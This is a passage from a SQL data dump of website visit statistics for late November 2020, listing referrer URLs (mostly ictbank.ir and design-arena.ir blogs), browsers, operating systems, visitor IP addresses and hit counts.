(6719,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.173.190.4','000',0,1,0),
(6720,'2020-11-22','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.129.40.166','000',0,2,0),
(6721,'2020-11-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(6722,'2020-11-22','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','18.223.169.251','000',0,1,0),
(6723,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.53','000',0,1,0),
(6724,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.249.16','000',0,1,0),
(6725,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.52.131','000',0,1,0),
(6726,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.19','000',0,1,0),
(6727,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.255.200.31','000',0,1,0),
(6728,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.225.228.54','000',0,1,0),
(6729,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.169.100','000',0,1,0),
(6730,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','3.87.42.214','000',0,1,0),
(6731,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.159.235.186','000',0,1,0),
(6732,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.55.72','000',0,1,0),
(6733,'2020-11-22','http://design-arena.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','77.222.115.97','000',0,2,0),
(6734,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.246.234','000',0,1,0),
(6735,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.181.146','000',0,51,0),
(6736,'2020-11-22','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.174.60.42','000',0,1,0),
(6737,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.203.30.140','000',0,1,0),
(6738,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.236.20','000',0,1,0),
(6739,'2020-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.38.40.25','000',0,1,0),
(6740,'2020-11-22','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.223.53.32','000',0,1,0),
(6741,'2020-11-22','google.com','Unknown','Windows','10.0',NULL,NULL,'','20.190.60.112','000',0,1,0),
(6742,'2020-11-22','https://www.google.com/','Chrome','Android','11',NULL,NULL,'','77.3.3.24','000',0,2,0),
(6743,'2020-11-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(6744,'2020-11-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6745,'2020-11-22','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.215.82.157','000',0,1,0),
(6746,'2020-11-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6747,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.27.44','000',0,1,0),
(6748,'2020-11-23','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','174.140.230.171','000',0,1,0),
(6749,'2020-11-23','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.223.53.32','000',0,2,0),
(6750,'2020-11-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','129.28.157.97','000',0,2,0),
(6751,'2020-11-23','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.84','000',0,1,0),
(6752,'2020-11-23','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.6','000',0,1,0),
(6753,'2020-11-23','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','185.220.101.4','000',0,1,0),
(6754,'2020-11-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6755,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(6756,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.213.183','000',0,1,0),
(6757,'2020-11-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','85.25.217.96','000',0,3,0),
(6758,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.68.173','000',0,1,0),
(6759,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.88.9','000',0,1,0),
(6760,'2020-11-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6761,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.29.150.102','000',0,1,0),
(6762,'2020-11-23','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.4.80','000',0,1,0),
(6763,'2020-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','31.220.40.241','000',0,1,0),
(6764,'2020-11-23','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.235.139.178','000',0,1,0),
(6765,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.99.50','000',0,1,0),
(6766,'2020-11-23','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','63.34.10.253','000',0,1,0),
(6767,'2020-11-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.151.211.50','000',0,1,0),
(6768,'2020-11-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','37.110.148.87','000',0,1,0),
(6769,'2020-11-23','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.223.165.28','000',0,1,0),
(6770,'2020-11-23','https://www.startpage.com/','Firefox','Windows','6.1',NULL,NULL,'','108.197.151.219','000',0,2,0),
(6771,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','91.144.130.24','000',0,1,0),
(6772,'2020-11-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6773,'2020-11-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6774,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.244.52.99','000',0,1,0),
(6775,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.6.139.26','000',0,1,0),
(6776,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.226.2','000',0,1,0),
(6777,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.170','000',0,1,0),
(6778,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.236.41.231','000',0,1,0),
(6779,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.214.250.123','000',0,1,0),
(6780,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.113.227.93','000',0,1,0),
(6781,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.50.235','000',0,1,0),
(6782,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.60','000',0,1,0),
(6783,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.110.205.164','000',0,1,0),
(6784,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.155','000',0,1,0),
(6785,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.89.225.92','000',0,1,0),
(6786,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.25','000',0,1,0),
(6787,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(6788,'2020-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','106.250.189.74','000',0,1,0),
(6789,'2020-11-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','201.239.250.90','000',0,1,0),
(6790,'2020-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.103.72.95','000',0,1,0),
(6791,'2020-11-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,3,0),
(6792,'2020-11-24','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','24.114.37.129','000',0,1,0),
(6793,'2020-11-24','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.223.165.28','000',0,1,0),
(6794,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.193.120.141','000',0,1,0),
(6795,'2020-11-24','http://ftp.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.141','000',0,1,0),
(6796,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.139','000',0,1,0),
(6797,'2020-11-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','37.9.13.155','000',0,1,0),
(6798,'2020-11-24','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','35.222.22.83','000',0,3,0),
(6799,'2020-11-24','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','35.184.46.115','000',0,1,0),
(6800,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.198.24.101','000',0,1,0),
(6801,'2020-11-24','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','217.63.200.48','000',0,1,0),
(6802,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.15.132','000',0,1,0),
(6803,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.148.144','000',0,1,0),
(6804,'2020-11-24','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.15.179.67','000',0,1,0),
(6805,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.180.40','000',0,1,0),
(6806,'2020-11-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6807,'2020-11-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.119.5','000',0,1,0),
(6808,'2020-11-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','37.9.13.156','000',0,1,0),
(6809,'2020-11-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','5.130.72.125','000',0,1,0),
(6810,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.32','000',0,1,0),
(6811,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.28','000',0,1,0),
(6812,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.26','000',0,1,0),
(6813,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.12.253.83','000',0,1,0),
(6814,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(6815,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.150','000',0,1,0),
(6816,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(6817,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.60','000',0,1,0),
(6818,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.42.250.174','000',0,1,0),
(6819,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.124.64.126','000',0,1,0),
(6820,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.133','000',0,1,0),
(6821,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(6822,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.28','000',0,1,0),
(6823,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.135.237.134','000',0,1,0),
(6824,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.64','000',0,1,0),
(6825,'2020-11-24','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','38.132.101.218','000',0,1,0),
(6826,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(6827,'2020-11-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6828,'2020-11-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(6829,'2020-11-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6830,'2020-11-24','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.77.142.166','000',0,2,0),
(6831,'2020-11-24','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.71.92.25','000',0,1,0),
(6832,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.106','000',0,1,0),
(6833,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.193','000',0,1,0),
(6834,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.141','000',0,1,0),
(6835,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.223.121.235','000',0,1,0),
(6836,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.150','000',0,1,0),
(6837,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','212.129.24.108','000',0,1,0),
(6838,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.144.130.23','000',0,1,0),
(6839,'2020-11-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.105','000',0,1,0),
(6840,'2020-11-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6841,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.103.209','000',0,1,0),
(6842,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.172','000',0,2,0),
(6843,'2020-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.120.202','000',0,1,0),
(6844,'2020-11-25','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','37.120.142.231','000',0,2,0),
(6845,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.37.103.70','000',0,2,0),
(6846,'2020-11-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.4','000',0,1,0),
(6847,'2020-11-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.5','000',0,1,0),
(6848,'2020-11-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.125','000',0,1,0),
(6849,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.135.111','000',0,1,0),
(6850,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.6.198.114','000',0,2,0),
(6851,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.80.164','000',0,1,0),
(6852,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.236.133.77','000',0,1,0),
(6853,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.150','000',0,1,0),
(6854,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.26','000',0,1,0),
(6855,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.36','000',0,1,0),
(6856,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.227.167','000',0,1,0),
(6857,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.147.242.190','000',0,1,0),
(6858,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.153','000',0,1,0),
(6859,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.28','000',0,1,0),
(6860,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.40','000',0,1,0),
(6861,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(6862,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.78','000',0,1,0),
(6863,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.142.232.241','000',0,1,0),
(6864,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.140','000',0,1,0),
(6865,'2020-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.127.175.10','000',0,1,0),
(6866,'2020-11-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(6867,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.205.116','000',0,1,0),
(6868,'2020-11-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.119.5','000',0,1,0),
(6869,'2020-11-25','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6870,'2020-11-25','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','51.75.146.127','000',0,6,0),
(6871,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.45.115','000',0,1,0),
(6872,'2020-11-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','44.242.170.205','000',0,1,0),
(6873,'2020-11-25','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.61.162.219','000',0,10,0),
(6874,'2020-11-25','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','216.45.54.144','000',0,2,0),
(6875,'2020-11-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(6876,'2020-11-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(6877,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.118.166.15','000',0,2,0),
(6878,'2020-11-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.3.234.160','000',0,1,0),
(6879,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.188.183.185','000',0,1,0),
(6880,'2020-11-26','http://design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','210.16.188.124','000',0,1,0),
(6881,'2020-11-26','https://www.google.com/','Opera','Linux','Unknown',NULL,NULL,'','186.83.52.17','000',0,2,0),
(6882,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.49.27','000',0,1,0),
(6883,'2020-11-26','https://www.google.com/','Chrome','Android','9',NULL,NULL,'','177.252.190.198','000',0,1,0),
(6884,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','37.9.13.155','000',0,2,0),
(6885,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','168.181.121.195','000',0,1,0),
(6886,'2020-11-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,3,0),
(6887,'2020-11-26','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','100.26.135.239','000',0,3,0),
(6888,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.7.87','000',0,1,0),
(6889,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.216.126.29','000',0,1,0),
(6890,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.57.42','000',0,1,0),
(6891,'2020-11-26','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(6892,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.127.179','000',0,1,0),
(6893,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.208.209.54','000',0,1,0),
(6894,'2020-11-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.162.109.106','000',0,1,0),
(6895,'2020-11-26','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.17.207.251','000',0,1,0),
(6896,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.105.87.76','000',0,2,0),
(6897,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.83.69.60','000',0,1,0),
(6898,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','37.9.13.156','000',0,2,0),
(6899,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(6900,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','180.211.243.222','000',0,1,0),
(6901,'2020-11-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','89.142.193.82','000',0,1,0),
(6902,'2020-11-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.157.97','000',0,1,0),
(6903,'2020-11-26','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','106.52.163.30','000',0,1,0),
(6904,'2020-11-26','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.69.197.42','000',0,1,0),
(6905,'2020-11-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(6906,'2020-11-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(6907,'2020-11-26','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','34.67.50.16','000',0,1,0),
(6908,'2020-11-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6909,'2020-11-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6910,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.30.200','000',0,1,0),
(6911,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.97.170','000',0,1,0),
(6912,'2020-11-27','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','81.4.127.77','000',0,2,0),
(6913,'2020-11-27','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','35.173.47.244','000',0,1,0),
(6914,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.56.126','000',0,1,0),
(6915,'2020-11-27','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','188.165.148.31','000',0,1,0),
(6916,'2020-11-27','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(6917,'2020-11-27','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','104.198.59.230','000',0,2,0),
(6918,'2020-11-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(6919,'2020-11-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(6920,'2020-11-27','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','195.154.178.247','000',0,2,0),
(6921,'2020-11-27','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','5.130.72.125','000',0,1,0),
(6922,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.14','000',0,1,0),
(6923,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.161','000',0,1,0),
(6924,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.188','000',0,1,0),
(6925,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.137','000',0,1,0),
(6926,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.51','000',0,1,0),
(6927,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','108.174.49.215','000',0,1,0),
(6928,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.190.16.70','000',0,1,0),
(6929,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(6930,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.40','000',0,1,0),
(6931,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','180.131.110.155','000',0,1,0),
(6932,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.28','000',0,1,0),
(6933,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(6934,'2020-11-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.225.146.4','000',0,1,0),
(6935,'2020-11-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.74.82','000',0,2,0),
(6936,'2020-11-28','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(6937,'2020-11-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','91.241.19.84','000',0,6,0),
(6938,'2020-11-28','http://ictbank.ir/blog/','Android Browser','Android','2.2',NULL,NULL,'','220.181.77.162','000',0,1,0),
(6939,'2020-11-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.160.19','000',0,1,0),
(6940,'2020-11-28','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','87.123.133.39','000',0,1,0),
(6941,'2020-11-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.15.90','000',0,1,0),
(6942,'2020-11-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(6943,'2020-11-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.213.247','000',0,1,0),
(6944,'2020-11-28','http://ictbank.ir/','Chrome','OS X','10.11.3',NULL,NULL,'','89.187.170.129','000',0,1,0),
(6945,'2020-11-28','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.65.56','000',0,10,0),
(6946,'2020-11-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(6947,'2020-11-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.83.128.121','000',0,1,0),
